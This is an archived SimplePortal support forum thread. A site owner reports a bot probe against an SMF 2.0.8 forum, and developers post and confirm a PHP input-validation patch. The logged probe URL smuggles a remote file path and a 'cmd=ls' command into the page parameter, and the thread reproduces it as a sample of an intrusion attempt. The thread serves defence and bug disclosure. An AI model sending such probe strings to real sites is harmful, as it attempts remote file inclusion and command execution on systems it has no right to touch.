* Archive Notice

This is an Archive Forum.

The content in this forum may be out-of-date or have been superseded by newer information, and links in forum pages to other sites may not work. This forum contains archives for future reference.

Author Topic: Possible SP hack on SMF  (Read 7233 times)


Offline busterone

  • Semi Newbie
  • Posts: 14
  • Gender: Male
    • The Demon's Den
  • SMF Version: 2.0.8
  • SP Version: 2.3.5
Possible SP hack on SMF
« on: August 11, 2014, 08:56:36 PM »
As per this topic at simplemachines.org: http://www.simplemachines.org/community/index.php?topic=526259.msg3730305#msg3730305
Arantor suggested I post this here for the developers to take a look at. There is no apparent weakness, but the response to the url request was odd. I received a "sorry, SMF could not connect to the database" error upon attempting to manually access this url.
Here is the url and error from the error log:
```
http://www.thedemonsden.com/index.php?page[path]=http://www.google.com/humans.txt?&cmd=ls
Undefined offset: 0
File: /homepages/xxxxxxxxxxxxxxx/htdocs/forum/Sources/Subs-Db-mysql.php
Line: 103
```

I am using SMF 2.0.8 and SimplePortal 2.3.5.

I will include the installed mods list as well:
1. SMF 2.0.8 Update 1.0
2. SMF 2.0.7 Update 1.0
3. Add IP2Location to Track IP 1.31
4. SMF 1.1.19 / 2.0.6 Update 1.0
5. Treasury 2.12
6. SMF 2.0.5 Update 1.0
7. Misc Anti Spam 1.0
8. Stupid bouncy BBC 1.0
9. SMF 2.0.4 Update 1.0
10. SMF 2.0.3 Update 1.0
11. Annoy User 1.2.2
12. SimplePortal 2.3.5
13. SMF 2.0.2 Update 1.0
14. SMF 2.0.1 Update 1.0
15. SMF4Mobile Mod 1.0
16. Sitemap 2.2.0
17. LMGTFY BBcode v2.2 2.2
18. Bookmarks 2.3
19. Spoiler Tag 0.7.2
20. PM Attachments 1.6
21. Custom Action Mod 3.2
22. httpBL 2.5.1
23. Stop Spammer 2.3.9
24. SMF Chess 2.1.4
25. SMF Staff Page 1.7
26. PM to New Members 1.2
27. Aeva ~ Auto-Embed Video & Audio 7.0
28. The Rules 1.2
29. Add Domaintools to TrackIP 1.1
30. Arcadeworld Template 2.4
31. E-Arcade Beta4-SMF2rc2

As stated in the original topic, there is no harm done and no access to the site period, it is simply the site response that is odd.

Offline Chen Zhen

  • The Underdog
  • Operations Manager
  • Posts: 1351
  • Gender: Male
  • Kinesis
    • WebDev
  • SMF Version: 2.1
  • EhPortal Version: 1.22
Re: Possible SP hack on SMF
« Reply #1 on: August 11, 2014, 10:49:41 PM »
Here is a patch for the specific issue you describe:

file: ../Sources/Subs-Portal.php

find:
```php
if (!empty($_GET['page']) && (empty($context['current_action']) || $context['current_action'] == 'portal'))
	$page_info = sportal_get_pages($_GET['page'], true, true);
```

replace with:
```php
if (!empty($_GET['page']) && (empty($context['current_action']) || $context['current_action'] == 'portal'))
{
	// Only accept a plain string; an array (e.g. page[path]=...) becomes 0 and is rejected by the digit check below.
	$page_info = (!empty($_GET['page'])) && !is_array($_GET['page']) ? $smcFunc['htmltrim']($_GET['page']) : 0;
	// Same rule as the admin namespace filter: anything outside A-Za-z0-9_ or containing a digit is refused.
	if (preg_match('~[^A-Za-z0-9_]+~', $page_info) != 0 || preg_match('~[0-9]+~', $page_info) != 0)
		fatal_lang_error('error_sp_page_not_found', false);

	$page_info = sportal_get_pages($page_info, true, true);
}
```

All I did here was more or less apply the filter Sinan put in the SP admin template to the page request entered in the url.


Regards.
« Last Edit: August 12, 2014, 01:01:04 AM by Underdog »
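As an added illustration (my own example, not SimplePortal's code): how PHP turns the probing query string into an array before it reaches the page lookup, and a stand-alone version of the check in the patch above applied to a few constructed inputs. The function `sp_validate_page_request` and the sample query strings are constructed for this example, plain `trim()` stands in for `$smcFunc['htmltrim']`, and the probe's host is replaced by a placeholder.

```php
<?php
// Added example, not SimplePortal code: shows why page[path]=... arrives as an
// array and applies the same rule as the patch above to constructed inputs.

// Mirrors the patched check: reject arrays and empty values, then refuse any
// character outside A-Z/a-z/0-9/_ and (as the patch does) any digit at all.
// trim() stands in for $smcFunc['htmltrim'] here.
function sp_validate_page_request($page)
{
    if (empty($page) || is_array($page))
        return false;
    $page = trim($page);
    if (preg_match('~[^A-Za-z0-9_]+~', $page) != 0 || preg_match('~[0-9]+~', $page) != 0)
        return false;
    return $page;
}

// Constructed query strings. The second mirrors the probe from the error log,
// with the remote host replaced by a placeholder.
$samples = array(
    'page=about_us',
    'page[path]=http://example.invalid/humans.txt?&cmd=ls',
    'page=../../etc/passwd',
    'page=two words',
);

foreach ($samples as $query) {
    // parse_str() does what PHP does for $_GET: page[path]=x becomes array('path' => 'x')
    parse_str($query, $get);
    $page = isset($get['page']) ? $get['page'] : '';
    $result = sp_validate_page_request($page);
    printf("%-55s %-6s -> %s\n", $query, gettype($page),
        $result === false ? 'rejected (page not found)' : 'look up namespace ' . $result);
}
```

Only the first sample survives the check; the array from the probe and the two malformed strings are all turned into the "page not found" path rather than reaching the database query.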

Offline busterone

  • Semi Newbie
  • Posts: 14
  • Gender: Male
    • The Demon's Den
  • SMF Version: 2.0.8
  • SP Version: 2.3.5
Re: Possible SP hack on SMF
« Reply #2 on: August 12, 2014, 10:39:08 AM »
Thanks Underdog.  I cleared the error log and waited 2 days and these bots came back for 5 shots at it again, then stopped. Obviously it wasn't getting them the results they wanted, and there was no security issue that I can see either. It seems that they must just be probing for a weakness through the page request.  Better safe than sorry though. :)

Offline [SiNaN]

  • Mr. SimplePortal
  • Developer
  • Posts: 6782
  • SMF Version: 2.0.15
  • SP Version: 2.3.7
Re: Possible SP hack on SMF
« Reply #3 on: August 12, 2014, 11:04:21 AM »
It turns out that the code we have does not account for certain cases. This will be fixed in our upcoming patch level release. Thank you for your report!
And slowly, you come to realize... It's all as it should be...

Offline busterone

  • Semi Newbie
  • Posts: 14
  • Gender: Male
    • The Demon's Den
  • SMF Version: 2.0.8
  • SP Version: 2.3.5
Re: Possible SP hack on SMF
« Reply #4 on: August 12, 2014, 04:58:46 PM »
No problem at all. If the bots had not hammered away like they did, I probably would not have noticed it at all if it had only been a few errors in the log.   :)

Offline Chen Zhen

  • The Underdog
  • Operations Manager
  • Posts: 1351
  • Gender: Male
  • Kinesis
    • WebDev
  • SMF Version: 2.1
  • EhPortal Version: 1.22
Re: Possible SP hack on SMF
« Reply #5 on: August 12, 2014, 06:23:10 PM »
busterone,

Does the patch work as expected? (0 errors in the log, and an incorrect page request is directed to the "page does not exist" display)

Offline busterone

  • Semi Newbie
  • Posts: 14
  • Gender: Male
    • The Demon's Den
  • SMF Version: 2.0.8
  • SP Version: 2.3.5
Re: Possible SP hack on SMF
« Reply #6 on: August 12, 2014, 08:45:33 PM »
Works perfectly. No errors in the error log, and the forum does direct to the "The page you requested cannot be found." error page.

Offline [SiNaN]

  • Mr. SimplePortal
  • Developer
  • Posts: 6782
  • SMF Version: 2.0.15
  • SP Version: 2.3.7
Re: Possible SP hack on SMF
« Reply #7 on: August 16, 2014, 05:44:08 AM »
Fixed for the upcoming version.
And slowly, you come to realize... It's all as it should be...